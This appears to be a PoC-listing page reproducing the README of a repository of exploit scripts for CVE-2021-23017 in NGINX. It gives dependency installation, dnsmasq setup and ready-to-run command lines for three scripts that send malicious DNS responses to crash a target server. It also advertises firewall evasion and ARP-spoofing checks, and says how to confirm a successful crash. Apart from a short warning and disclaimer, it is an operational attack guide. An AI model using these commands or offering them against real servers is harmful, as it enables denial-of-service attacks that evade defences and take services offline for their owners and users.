CVE-2021-23017 PoC — F5 NGINX Controller 安全漏洞

Source

Associated Vulnerability

Description

vulnerability in NGINX servers (versions 0.6.18–1.20.0). The scripts aim to cause a Denial of Service (DoS) by sending malicious DNS responses, with enhancements to bypass firewalls.

Readme

vulnerability in NGINX servers (versions 0.6.18–1.20.0). The scripts aim to cause a Denial of Service (DoS) by sending malicious DNS responses, with enhancements to bypass firewalls. This is an improved version of the original PoC from [M507/CVE-2021-23017-PoC](https://github.com/M507/CVE-2021-23017-PoC) .

**Warning**: Use only with explicit written permission from the system owner. Unauthorized testing is illegal.

## Requirements
- **Environment**: Linux (e.g., Kali Linux, via Termux/virtualized setup).
- **Dependencies**:
  ```bash
  sudo apt-get update
  sudo apt-get install python3-scapy dnsmasq
  pip3 install scapy requests
  ```
- **Network**: Same subnet as the target for ARP spoofing, or the target NGINX must use your DNS server IP.


## Installation
1. Clone the repository:
   ```bash
   git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
   cd evil-CVE-2021-23017
   ```
2. Set up `dnsmasq`:
   ```bash
   sudo nano /etc/dnsmasq.conf
   ```
   Add:
   ```
   address=/test.example.com/192.168.1.100
   ```
   Start:
   ```bash
   sudo systemctl start dnsmasq
   ```

## What It Does
- Sends malicious DNS responses with a long domain name (`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com`) to crash the NGINX server.
- Triggers DNS queries using `curl` and `dig` to exploit the vulnerability.
- Bypasses firewalls by sending direct DNS packets and using parallel processes.

## Differences from Original
Compared to [M507/CVE-2021-23017-PoC](https://github.com/M507/CVE-2021-23017-PoC):
- **Enhanced Firewall Bypass**: Uses parallel processes in `poc1.2.3.py` for simultaneous sniffing, DNS sending, and query triggering , you must Run the three together.
- **Optimized Packet Delivery**: Higher frequency of packets and queries to evade firewall filters.
- **Subnet Checking**: Verifies network compatibility for ARP spoofing, improving reliability.

## Usage
Run the three together and Run with appropriate arguments (replace `<target_ip>`, `<your_dns_server_ip>`, `<target_url>`).

### `poc.py`
```bash
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
```
- Sniffs and responds to DNS queries.

### `poc2.py`
```bash
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
```
- Adds direct DNS sending and query triggering.

### `poc3.py` (Recommended)
```bash
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
```
- Runs tasks in parallel for maximum efficiency.

### Example
```bash
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
```

## Verify Results
- Check server status:
  ```bash
  curl -I http://<target_url>
  ```
  - **Success**: `502 Bad Gateway` or `503 Service Unavailable` indicates a server crash.
  - **Failure**: `200 OK` suggests no vulnerability or firewall blocking.

- Monitor DNS traffic:
  ```bash
  sudo wireshark -f "udp port 53"
  ```



**Disclaimer**: For educational purposes only. Authors are not responsible for misuse.

File Snapshot

 [4.0K]  /data/pocs/7778e0dbaf7d5ef90d30390b10567536dbe650a7
├── [6.0K]  poc2.py
├── [6.5K]  poc3.py
├── [3.8K]  poc.py
└── [3.1K]  README.md

0 directories, 4 files

Remarks